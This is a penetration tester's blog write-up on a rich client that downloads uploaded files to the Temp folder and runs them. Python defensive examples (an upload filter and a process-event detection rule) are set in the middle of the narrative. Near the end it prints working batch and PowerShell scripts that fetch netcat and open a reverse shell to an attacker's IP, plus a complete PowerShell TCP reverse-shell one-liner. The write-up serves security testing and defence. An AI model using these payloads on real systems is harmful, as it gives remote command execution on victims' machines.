A Rich Client Shell


Outlined below is a technique I found during one of my security assessments, with which it was possible to get a reverse shell on a Windows system via a rich client.

Rich Client:

A rich client is a networked computer that has some resources installed locally but also depends on other resources distributed over the network. The rich client’s configuration is somewhere between that of a thin client, which relies largely upon network-distributed resources, and a fat client which has most resources installed locally.

– (Source: Internet)

It was a five-day assessment and, to be frank, I wouldn’t say the testing was going really well. The application was huge, comprising various environments, functionalities and modules to be tested, and the developers of the application had made sure that most things were secure, except for one module, which you will find out about by the end of the blog.

So the only things I could get my hands on were some sensitive data such as usernames/passwords, server details, etc. stored in the system’s log files. The client-server traffic was encrypted and most interception methods failed.

During this process I came across multiple upload functionalities that were accessible to all users 😈

Note: The application had multiple user groups and I was given a few roles for testing. Users within the same group had access to each other’s data.

As it was a confidential application, we were supposed to verify the antivirus checks on the server side #OrganizationGoals. Hence, I tried uploading the famous ‘eicar.exe’ antivirus test file to check the behaviour of the application.

Upload successful!
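The server-side check the assessment set out to verify can be written down as an upload gate. The block below is an added example in Python and is not the assessed application’s code: it rejects uploads whose extension is outside an allow-list, sniffs the content for executable magic bytes whatever the filename claims, catches double extensions such as report.pdf.exe, and recognises the EICAR test string that a server-side antivirus scan would have flagged. The allow-list, the magic-byte table and every sample filename and payload are constructed for the example.

```python
"""
Server-side upload gate (added example; not the assessed application's code).

Every rejection names the rule that fired, so a log line from this gate is
enough to explain why an upload such as eicar.exe never reached storage.
"""
import re

# Extensions the business process actually needs (constructed allow-list).
ALLOWED_EXTENSIONS = {".pdf", ".docx", ".xlsx", ".png", ".jpg", ".txt"}

# Magic bytes that identify executable content regardless of the filename.
EXECUTABLE_MAGIC = {
    b"MZ": "Windows PE executable (exe/dll/scr)",
    b"\x7fELF": "ELF executable",
    b"#!": "script with interpreter line",
}

# The EICAR antivirus test string as published by EICAR. Scanners treat a
# file beginning with it as malware, which is exactly what the upload test
# in the post relied on.
EICAR_SIGNATURE = rb"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

# Executable extensions anywhere in the name, e.g. "report.pdf.exe" or
# "report.exe.pdf", which a naive last-extension check would let through.
DOUBLE_EXTENSION = re.compile(r"\.(exe|dll|scr|bat|cmd|ps1|js|vbs|hta)(\.|$)", re.I)


def extension_of(filename: str) -> str:
    """Lower-cased last extension; trailing dots/spaces Windows strips are ignored."""
    name = filename.strip().rstrip(". ").lower()
    dot = name.rfind(".")
    return name[dot:] if dot >= 0 else ""


def check_upload(filename: str, content: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for one upload."""
    if not filename or "/" in filename or "\\" in filename or ".." in filename:
        return False, "invalid filename"
    if DOUBLE_EXTENSION.search(filename.lower()):
        return False, "executable extension present in filename"
    ext = extension_of(filename)
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension {ext or '<none>'} not in allow-list"
    for magic, description in EXECUTABLE_MAGIC.items():
        if content.startswith(magic):
            return False, f"content is a {description}"
    if EICAR_SIGNATURE in content:
        return False, "anti-virus test signature detected"
    return True, "accepted"


if __name__ == "__main__":
    # Constructed uploads: the test file from the post plus a few disguises.
    samples = [
        ("eicar.exe", EICAR_SIGNATURE),
        ("eicar.txt", EICAR_SIGNATURE),
        ("report.pdf.exe", b"%PDF-1.4 constructed"),
        ("report.pdf", b"MZ\x90\x00 constructed PE header"),
        ("report.pdf", b"%PDF-1.4 constructed"),
    ]
    for name, data in samples:
        accepted, reason = check_upload(name, data)
        print(f"{name:16} {'ACCEPT' if accepted else 'REJECT'}: {reason}")
```

Note that this gate only stops hostile files at the door; the finding in this post is that the client executes whatever it fetches, and a gate does not change that. The real fix is on the client side: never run a downloaded file, and at most open it with the handler for its declared type.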

I tried double-clicking on the uploaded ‘eicar.exe’ file and was interrupted by this popup:

[Image: antivirus alert]

Notice the Path? C:\Users\XYZ\AppData\Local\Temp\eicar_Internal.exe

Firstly, what is ‘eicar_Internal.exe’? And what’s it doing in the ‘Temp’ folder?

Secondly, why exactly was the file caught by the antivirus?

After a bit of playing around with the application, I noticed that whenever a user tried to access any of the uploaded files, the application downloaded a copy of that file onto the user’s system, with ‘_Internal’ appended to its name, and EXECUTED it without any user interaction.

In simpler words: eicar.exe is renamed to eicar_Internal.exe and executed.


I immediately switched to another VM and logged into the application as a different user. The results were the same.

‘eicar_Internal.exe’ was downloaded and executed from the TEMP folder.
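From the defender’s side, the behaviour observed here (a binary appearing in the user’s Temp folder with an _Internal suffix and running with no user interaction) is easy to express as a detection rule. The block below is an added example in Python, not part of the original post or of the application: it runs over constructed process-creation events in the shape of Sysmon Event ID 1 fields (Image, ParentImage via PID, CommandLine, User) and flags (1) any process whose image lives under AppData\Local\Temp and ends in _Internal.exe and (2) a PowerShell or cmd process whose arguments download or decode code, rated high when its parent chain includes a flagged process. RichClient.exe, the PIDs and the user names are placeholders; the post does not name the application.

```python
"""
Detection for "download-and-execute from Temp" (added example; not the
post's or the vendor's code). Events are expected in chronological order,
parent before child, which is how an endpoint log delivers them.
"""
import re
from dataclasses import dataclass

# Rule 1: image path under the user's Temp folder with the client's "_Internal" suffix.
TEMP_INTERNAL = re.compile(r"\\AppData\\Local\\Temp\\[^\\]*_Internal\.exe$", re.I)

# Rule 2: shell interpreters launched with arguments that fetch or decode code.
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe"}
SUSPICIOUS_ARGS = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biex\b|-enc(odedcommand)?\b|set-executionpolicy",
    re.I,
)


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    ppid: int
    image: str          # Sysmon "Image"
    command_line: str   # Sysmon "CommandLine"
    user: str


@dataclass(frozen=True)
class Alert:
    rule: str
    pid: int
    image: str


def detect(events):
    """Return the alerts raised by the events, in input order."""
    alerts = []
    flagged = set()   # processes started from Temp\*_Internal.exe and their descendants
    for e in events:
        if TEMP_INTERNAL.search(e.image):
            flagged.add(e.pid)
            alerts.append(Alert("temp-internal-exec", e.pid, e.image))
        if e.ppid in flagged:
            flagged.add(e.pid)   # a child of a flagged process inherits the suspicion
        base = e.image.rsplit("\\", 1)[-1].lower()
        if base in SHELL_IMAGES and SUSPICIOUS_ARGS.search(e.command_line):
            severity = "high" if e.pid in flagged else "medium"
            alerts.append(Alert(f"shell-suspicious-args-{severity}", e.pid, e.image))
    return alerts


# Constructed sample: the rich client fetches an upload, runs it from Temp,
# and the dropped binary launches PowerShell to download something. The
# last two events are ordinary activity that must not fire.
SAMPLE_EVENTS = [
    ProcessEvent(4001, 900, r"C:\Program Files\RichClient\RichClient.exe", "RichClient.exe", r"CORP\xyz"),
    ProcessEvent(4120, 4001, r"C:\Users\XYZ\AppData\Local\Temp\report_Internal.exe", "report_Internal.exe", r"CORP\xyz"),
    ProcessEvent(4133, 4120, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -Command "(New-Object Net.WebClient).DownloadFile(...)"', r"CORP\xyz"),
    ProcessEvent(4200, 700, r"C:\Windows\System32\notepad.exe", "notepad.exe", r"CORP\xyz"),
    ProcessEvent(4210, 700, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell -File C:\Scripts\backup.ps1", r"CORP\admin"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[{alert.rule}] pid={alert.pid} image={alert.image}")
```

The parent-chain tracking is what separates this from a plain path match: a PowerShell download launched by an administrator’s script stays at medium, while the same command line spawned under a Temp\*_Internal.exe process is rated high, which is the chain this post produces.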

WHAAAAAAAAAT..!

I guess everyone knows by now what the ultimate goal is?

I wrote some scripts which would use PowerShell to download our best friend netcat onto the victim’s system and throw a shell back to the attacker.

Using Batch:

@echo off
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://github.com/diegocr/netcat/raw/master/nc.exe', 'nc_Internal.exe')"
nc_Internal.exe <Attacker's IP> 8888 -e cmd.exe

Using PowerShell:

Set-ExecutionPolicy Unrestricted
$webclient = New-Object System.Net.WebClient
$url = "https://github.com/diegocr/netcat/raw/master/nc.exe"
$file = "/<Download_Path>/nc_Internal.exe"
$webclient.DownloadFile($url,$file)
$end = '$file AttackersIP 8888 -e cmd.exe'
iex "& $end"

For people who have issues with antivirus while downloading netcat onto the victim’s system… do not worry!

My friend Aamer has written a PowerShell snippet which gets us a shell without needing netcat:

$client = New-Object System.Net.Sockets.TCPClient('AttackersIP',443);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length)}

Finally, when the victim tries to access the uploaded file… Game over!

Just make sure you’re listening!

[Image: shell]

Hope you enjoyed the blog!
